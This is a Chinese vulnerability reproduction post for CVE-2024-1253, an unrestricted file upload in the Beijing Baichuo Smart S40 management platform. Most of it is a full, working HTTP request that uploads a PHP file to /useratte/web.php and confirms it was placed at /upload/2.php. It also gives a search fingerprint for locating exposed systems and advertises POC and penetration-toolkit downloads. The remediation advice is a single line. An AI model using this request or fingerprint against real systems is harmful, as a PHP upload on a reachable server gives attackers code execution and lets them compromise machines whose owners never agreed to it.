免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
北京百绰智能S40管理平台20240126版本。
03
—
漏洞描述
北京百绰智能S40管理平台20240126版本存在一种关键漏洞。该漏洞影响了组件Import Handler的/useratte/web.php文件的某些未知功能。通过对参数file_upload的操纵可导致未受限的上传。攻击可能会远程启动。该漏洞的利用已经公开并可能被利用。
漏洞成因分析:
04
—
title="Smart管理平台"
05
—
漏洞复现
文件上传数据包:
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream
<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"
1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"
1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"
import
-----------------------------42328904123665875270630079328
回显文件路径/upload/2.php
漏洞复现成功
06
—
修复建议
升级到最新版本。
07
—
资料领取
新关注的朋友可以在后台发送关键字苗费获取下列资料:
后台发送【电子书】关键字获取学习资料网盘地址
后台发送【POC】关键字获取POC网盘地址
后台发送【工具】获取渗透工具包
原文始发于微信公众号(AI与网安):CVE-2024-1253
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论